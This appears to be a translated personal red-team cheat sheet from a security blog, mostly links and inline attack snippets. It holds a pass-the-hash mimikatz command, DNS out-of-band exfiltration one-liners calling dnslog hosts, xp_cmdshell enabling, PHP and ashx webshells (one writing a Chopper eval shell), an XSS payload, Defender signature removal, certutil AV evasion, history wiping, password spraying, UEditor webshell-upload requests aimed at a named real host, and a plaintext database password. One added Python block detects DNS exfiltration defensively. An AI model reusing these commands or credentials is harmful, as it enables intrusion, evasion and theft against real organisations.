Some everyday tips

Tips

Search engine syntax: https://blog.csdn.net/weixin_45116657/article/details/102761464


CVE-2020-14386: Linux kernel privilege escalation vulnerability:

Kernel privilege escalation; PoC: https://www.openwall.com/lists/oss-security/2020/09/03/3


PHP IMAP command execution: imap_open calls rsh to connect to the remote host, but Debian uses ssh by default, and ssh's -o option can be used to invoke system commands, so command injection is possible.



Various WAFs: https://mp.weixin.qq.com/s/PWkqNsygi-c_S7tW1y_Hxw


XXE via Excel import

https://xz.aliyun.com/t/3741


Start Apache

/etc/init.d/apache2 start


SSH soft link (symlink)

https://www.jozxing.cc/archives/1653


Apache Shiro

https://www.cnblogs.com/nul1/p/12827021.html


Privilege escalation collection

https://mp.weixin.qq.com/s/gijFjloNrEshsSaiMHr8oQ


JWT

https://xz.aliyun.com/t/6776#toc-10


WinRM command execution and port reuse

https://blog.csdn.net/k8gege/article/details/106442655


Red team tools

https://github.com/root-tools/redtool


PtH + RDP

https://www.dazhuanlan.com/2020/01/18/5e22c1493adef/

privilege::debug
sekurlsa::pth /user:administrator /domain:. /ntlm:xxxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"

Conditions:
The server must have Restricted Admin mode enabled.
Windows 7 and Windows Server 2008 R2 do not support it by default; patches 2871997 and 2973351 must be installed.

Enable Restricted Admin mode:

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

Device default passwords

http://www.srxh1314.com/mrkl.html


UEditor upload

https://zhuanlan.zhihu.com/p/42888106


Blind (no-echo) out-of-band exfiltration

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.b9530dbeff7692920356.d.zhack.ca && nslookup !FINAL!"

for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.bm21t3.dnslog.cn
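As an added defender-side example (not from the original notes), the following Python scans constructed DNS query log lines for the traces the two commands above leave behind: a base64-looking leftmost label, an oversized name, or a query to a DNS-logging service. The log format, the `callback.example` domain and the watchlist contents are assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample log, format "<timestamp> <client-ip> <query-name>" (assumed).
# Line 3 mimics the certutil/nslookup trick above (base64 of a whoami result as
# the leftmost label); line 4 mimics the ping-to-dnslog.cn variant.
SAMPLE_LOG = """\
2020-10-12T13:14:44 10.0.0.5 www.example.com
2020-10-12T13:14:45 10.0.0.5 update.example.net
2020-10-12T13:14:46 10.0.0.7 ZGVza3RvcC1hYmNcYWRtaW5pc3RyYXRvcg==.callback.example
2020-10-12T13:14:47 10.0.0.7 administrator.bm21t3.dnslog.cn
"""

# Suffixes of DNS-logging services to alert on (dnslog.cn appears in the notes above).
WATCHLIST_SUFFIXES = ("dnslog.cn",)
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/=]{20,}$")

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores higher than real hostnames."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def suspicious_label(label: str) -> bool:
    """True when a label looks like encoded data rather than a hostname."""
    return bool(BASE64_LABEL.match(label)) and shannon_entropy(label) > 3.5

def flag_exfil_queries(log_text: str):
    """Return (client, qname, reason) tuples for queries that look like DNS exfiltration."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname = line.split()
        qname = qname.rstrip(".")  # keep case: lowercasing would flatten the entropy check
        labels = qname.split(".")
        if any(qname.lower().endswith("." + s) for s in WATCHLIST_SUFFIXES):
            hits.append((client, qname, "query to DNS-logging service"))
        elif suspicious_label(labels[0]):
            hits.append((client, qname, "encoded-looking leftmost label"))
        elif len(qname) > 100 or len(labels[0]) > 50:
            hits.append((client, qname, "oversized query name"))
    return hits

if __name__ == "__main__":
    for client, qname, reason in flag_exfil_queries(SAMPLE_LOG):
        print(f"{client} -> {qname}: {reason}")
```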

Clear logs

(screenshot not preserved)


Linux privilege escalation:

https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651102317&idx=1&sn=0b0a840bd30896eb28b02ac117700bad&chksm=bd1f0ee68a6887f00b1bfbf8996d516abfed498e264561e4d022de359beacb96efe10c000733&scene=132#wechat_redirect


MSSQL cmd

-- Determine the current login's role
and 1=(select IS_SRVROLEMEMBER('public') )--
and 1=(select IS_SRVROLEMEMBER('sysadmin') )--
and 1=(select IS_SRVROLEMEMBER('db_owner') )--

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

EXEC master..xp_cmdshell '123.zpu2he.dnslog.cn'

-- If RECONFIGURE errors, use
reconfigure with override

mysqldump

mysqldump --defaults-extra-file=/tmp/11.cnf --databases jiebei_com >/home/www/jb.com/runtime/log/202010/jiebei_com.sql

Contents of /tmp/11.cnf:

[client]
port = 3306
socket = /tmp/mysql.sock
default-character-set = utf8mb4
host = 127.0.0.1
user = 'jiebei_com'
password = 'k7SHT62npa3j8RrS'

SimplyEmail

./SimplyEmail.py -all -v -e 

xray scan

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output zyhy3.html
python3 lancher.py

Commonly vulnerable points

https://mp.weixin.qq.com/s/6I-Yp0A69rLr3RfruIAkhA


Cisco ASA arbitrary file read

https://github.com/cygenta/CVE-2020-3452/blob/main/CVE-2020-3452.py


Exchange CVE-2020-17144

PoC: https://srcincite.io/pocs/cve-2020-17141.py.txt

CVE-2020-16875

PoC: https://srcincite.io/pocs/cve-2020-16875.py.txt


Citrix XenMobile arbitrary file read

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

VMware file read:

https://twitter.com/ptswarm/status/1316016337550938122


Internal network without outbound access

https://mp.weixin.qq.com/s/IeH06p7pkQ3lmOehGLUWLg

dnscat


MySQL 8.0 new features

  • table:

    TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

  • value:

    select * from users where id = 1 union values row(1,2,3)

When PHP system() has no permission to invoke cmd

Create a new COM object to invoke a different cmd.exe

<?php
$command = $_POST['a'];
$wsh = new COM('WScript.Shell');               // create a COM object
$exec = $wsh->exec('cmd.exe /c ' . $command);  // call the object's method to run the command
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

XSS payload

<%00EEEE<svg /\/\//ONLoad='a\u006c\u0065\u0072\u0074(1)'/\/\/\>svg>%0APayload

Encode/decode files with certutil to bypass AV

# encode
Certutil -encode d:\artifact.exe d:\artifact.txt

# write
echo sfAFASFAsfasgasdf………>>d:\1.txt

# decode
Certutil -decode d:\art.txt d:\art.exe

Disable Defender

C:\PROGRA~1\WINDOW~1>MpCmdRun.exe -RemoveDefinitions -all
MpCmdRun.exe -RemoveDefinitions -all

Service Version: 4.18.1812.3
Engine Version: 1.1.17600.5
AntiSpyware Signature Version: 1.327.2026.0
AntiVirus Signature Version: 1.327.2026.0
NRI Engine Version: 1.1.17600.5
NRI Signature Version: 1.327.2026.0

Starting engine and signature rollback to none...
Done!

Operations when the web server and database server are separated

  • mysql

    select @@hostname;                            // server hostname
    select * from information_schema.PROCESSLIST; // client hostnames and ports

    select load_file('C:/Windows/System32/drivers/etc/hosts'); // read a file
    /etc/hosts
    /etc/apache2/apache2.conf
    /etc/httpd/conf/httpd.conf
    /etc/udev/rules.d/70-persistent-net.rules // NIC name
    /etc/network/interfaces // DHCP or static IP
    /var/lib/dhclient/dhclient--<nic>.lease // DHCP
    /etc/sysconfig/network-scripts/ifcfg-<nic> // static IP
    C:/Windows/System32/drivers/etc/hosts
    C:/Windows/system32/inetsrv/MetaBase.xml
    C:/Windows/System32/inetsrv/config/applicationHost.config
    C:/phpStudy/Apache/conf/httpd.conf
    C:/phpStudy/Apache/conf/vhosts.conf
    C:/phpStudy/PHPTutorial/Apache/conf/httpd.conf
    C:/phpStudy/PHPTutorial/Apache/conf/vhosts.conf
    C:/phpStudy/PHPTutorial/nginx/conf/nginx.conf
    C:/phpStudy/PHPTutorial/nginx/conf/vhosts.conf
  • mssql

    select host_name();                   // client hostname
    select @@servername;                  // server hostname
    select serverproperty('MachineName'); // server hostname

    select name from master.sys.sysdatabases; // list databases
    select * from master.sys.sysprocesses where dbid= db_id('sqlinject'); // machines connected to the database
  • Token impersonation

    Whenever a host connects to this database server's MSSQL using Windows authentication, the logged-in user's token is retained, and since most people install MSSQL as the default Administrator, the Administrator token can be obtained directly.

    # msf
    meterpreter > use Incognito

ashx webshell

  • Generates an aspx webshell by itself

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;

public class Handler : IHttpHandler {
    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";
        string show = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"chopper\"],\"unsafe\");%>";
        StreamWriter file1 = File.CreateText(context.Server.MapPath("root.aspx"));
        file1.Write(show);
        file1.Flush();
        file1.Close();
    }
    public bool IsReusable {
        get {
            return false;
        }
    }
}

SSH reverse port forwarding

ssh -R 0.0.0.0:rport:localhost:lport root@x.x.x.x

Disable the theme

<%@ Page Language="Jscript" EnableTheming = "False" StylesheetTheme="" Theme="" %>

UEditor exploitation without outbound access

  • Upload locally

    POST /ueditor/net/controller.ashx?action=uploadimage HTTP/1.1
    Host: pmp.csc.com.cn
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------19350128512434
    Content-Length: 199

    -----------------------------19350128512434
    Content-Disposition: form-data; name="upfile"; filename="delicious.png"
    Content-Type: image/png

    123
    -----------------------------19350128512434--
  • Catch the local image to write a webshell

    POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1
    Host: pmp.csc.com.cn
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 99

    source%5B%5D=http://127.0.0.1/App_Upload/ueditor/image/20210116/6374641084286323059465749.png?.html
    • If it doesn't work, try a few other ports

Common web system weak passwords

http://uuzdaisuki.com/2020/11/09/%E5%B8%B8%E8%A7%81web%E7%B3%BB%E7%BB%9F%E9%BB%98%E8%AE%A4%E5%8F%A3%E4%BB%A4%E6%80%BB%E7%BB%93/


Enumeration and brute-forcing from outside the domain

https://github.com/3gstudent/pyKerbrute

  • EnumADUser.py

    python2 EnumADUser.py 192.168.60.1 test.com user.txt tcp

  • ADPwdSpray.py

    python2 ADPwdSpray.py 192.168.60.1 hacke.testlab user.txt clearpassword QWE123!@# tcp

    python2 ADPwdSpray.py 192.168.60.1 hacke.testlab user.txt ntlmhash 35c83173a6fb6d142b0359381d5cc84c udp

  • Check the .NET version

    dir %WINDIR%\Microsoft.Net\Framework
  • Zimbra: export mail

    ./zmmailbox -z -m username getRestURL "//?fmt=tgz&query=after:05/10/2022"> katiana.tgz
  • ADExplorer: export a .dat snapshot

    ADExplorer.exe -accepteula -snapshot "192.168.1.100" xxx.dat
  • Linux: don't record history

    unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
  • Find files

    C:\Users\the131> cd/
    C:\Users\the131> dir /b/s password.txt
    C:\Users\the131> dir /b/s config.*
    C:\Users\the131> findstr /si password *.xml *.ini *.txt
    C:\Users\the131> findstr /si login *.xml *.ini *.txt

Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting!